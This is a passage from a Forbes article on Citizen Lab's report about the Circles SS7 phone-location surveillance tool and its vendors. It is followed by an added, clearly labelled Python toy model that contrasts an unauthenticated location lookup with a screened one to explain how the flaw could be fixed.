An NSO spokesperson gave Forbes a joint NSO and Circles response, stating: "NSO and Circles are separate companies within the same corporate family, both of which lead their industries in a commitment to ethical business and adhere to strict laws and regulations in every market in which they operate. As we have previously stated, Circles is involved in search and rescue and tactical geolocation technology. We cannot comment on a report we have not seen. Given Citizen Lab's track record, we imagine this will once again be based on inaccurate assumptions and without a full command of the facts. As ever, we find ourselves being asked to comment on an unpublished report from an organization with a predetermined agenda." The spokesperson declined to comment on the countries listed by Citizen Lab as customers.

Citizen Lab said it tracked down Circles customers by looking for a unique "fingerprint" on servers across the globe that helped them identify where the spy tool was deployed. That fingerprint was built on numerous data points, most significantly a web domain that was linked to Circles business, according to the full technical report.

Spying in Circles

Circles was an independent intelligence agency vendor up until 2014, when it was acquired by private equity company Francisco Partners for $130 million and merged into a larger surveillance company. That umbrella organization also included NSO Group.

But Circles isn't the only SS7 surveillance provider on the market. Cyprus-based Intellexa, set up by former Circles co-founder Tal Dilian, uses SS7 exploitation as one of its many tools to track a target. Israeli companies Verint, Rayzone and 1rstWAP offer similar services, according to one industry executive. Ability Inc., another Israeli firm, tried to take the tech global, but crashed out of the Nasdaq after failing to secure customers.

Those providers' days should, in theory, be numbered, if they stick to solely doing SS7 attacks. The flaws that allow SS7 attacks to take place have long been fixable. The attacks are only possible because SS7, in its original form, doesn't require any authentication to guarantee the legitimacy and safety of messages traversing the network. It would require some effort by global telecoms networks to address the flaws, but some efforts have been made to patch the vulnerabilities. The U.K., for instance, recently proposed telecommunications security legislation that would grant a regulator the authority to ensure the nation's networks are secure against SS7 attacks.

Nevertheless, whilst those gaping holes remain open across global networks, government spies can continue to track anyone, anywhere, with just their phone number.

Source: https://www.forbes.com/sites/thomasbrewster/2020/12/01/this-spy-tool-can-find-you-with-just-a-telephone-number-and-25-countries-own-it-warn-researchers/?sh=78620548331e
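The article's core point is that SS7, in its original form, answers a roaming claim from any peer on the signalling interconnect without authenticating it, which is what turns a phone number into a cell-tower location. The following is an added example, not code from the article, from Citizen Lab or from Circles, and it does not speak real SS7/MAP. It models only the trust decision a home network makes when a peer claims one of its subscribers has roamed onto that peer's network: `LegacyHLR` hands back the serving cell to anyone who asks, while `ScreeningHLR` adds two assumed controls (an allowlist of roaming partners and a travel-speed plausibility check) that the article does not describe and that are my illustration of what "fixing" the flaw could look like. The network names, coordinates, IMSI and thresholds are constructed.

```python
"""Toy model of the SS7 location-disclosure trust decision.

Added example; not the article's, Citizen Lab's or Circles' code, and not a
real SS7/MAP implementation. All names, coordinates and limits are constructed.
"""
from dataclasses import dataclass
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0


@dataclass
class Subscriber:
    imsi: str
    cell_id: str      # serving cell tower id (constructed)
    lat: float        # coordinates of that tower (constructed)
    lon: float
    seen_at: float    # epoch seconds of the last trusted location update


def km_between(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometres (haversine formula)."""
    p1, p2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


class LegacyHLR:
    """Original SS7 trust model: the requesting network is not authenticated."""

    def __init__(self, subscribers):
        self.subs = {s.imsi: s for s in subscribers}

    def roaming_request(self, origin: str, imsi: str,
                        claimed_lat: float, claimed_lon: float, now: float) -> dict:
        sub = self.subs[imsi]
        # The roaming claim is taken at face value: whoever can inject
        # signalling learns the subscriber's current serving cell.
        return {"accepted": True, "cell_id": sub.cell_id,
                "lat": sub.lat, "lon": sub.lon}


class ScreeningHLR(LegacyHLR):
    """Assumed hardening: allowlisted origins plus a velocity check."""

    MAX_KMH = 1000.0  # faster than an airliner between two updates is implausible

    def __init__(self, subscribers, roaming_partners):
        super().__init__(subscribers)
        self.partners = set(roaming_partners)

    def roaming_request(self, origin, imsi, claimed_lat, claimed_lon, now):
        if origin not in self.partners:
            return {"accepted": False, "reason": "origin not a roaming partner"}
        sub = self.subs[imsi]
        hours = max((now - sub.seen_at) / 3600.0, 1e-6)
        kmh = km_between(sub.lat, sub.lon, claimed_lat, claimed_lon) / hours
        if kmh > self.MAX_KMH:
            return {"accepted": False,
                    "reason": f"implausible travel speed {kmh:.0f} km/h"}
        return super().roaming_request(origin, imsi, claimed_lat, claimed_lon, now)


def run_demo() -> dict:
    """Constructed scenario: target last seen in Bucharest ten minutes ago."""
    now = 1_606_800_000.0
    target = Subscriber("226010000000001", "cell-BUH-0042", 44.43, 26.10, now - 600)
    attacker = ("XX-SPY", 6.52, 3.38)        # unknown peer claiming Lagos now
    partner = ("PARTNER-DE", 52.52, 13.40)   # real partner reporting Berlin later

    legacy = LegacyHLR([target])
    screened = ScreeningHLR([target], ["PARTNER-DE"])
    return {
        "legacy_attacker": legacy.roaming_request(
            attacker[0], target.imsi, attacker[1], attacker[2], now),
        "screened_attacker": screened.roaming_request(
            attacker[0], target.imsi, attacker[1], attacker[2], now),
        # Same claim from an allowlisted origin: the velocity check still
        # rejects Lagos ten minutes after Bucharest.
        "screened_spoofed_partner": screened.roaming_request(
            "PARTNER-DE", target.imsi, attacker[1], attacker[2], now),
        "screened_partner": screened.roaming_request(
            partner[0], target.imsi, partner[1], partner[2], now + 4 * 3600),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result}")
```

The legacy handler is the behaviour the article describes: the location leaks to any peer that can reach the signalling network. The screening handler only illustrates that the fix is a policy decision at the home network, which is why the article can say the flaws "have long been fixable" while also noting it takes effort across operators, since every interconnect peer has to be classified and every subscriber's last trusted location tracked.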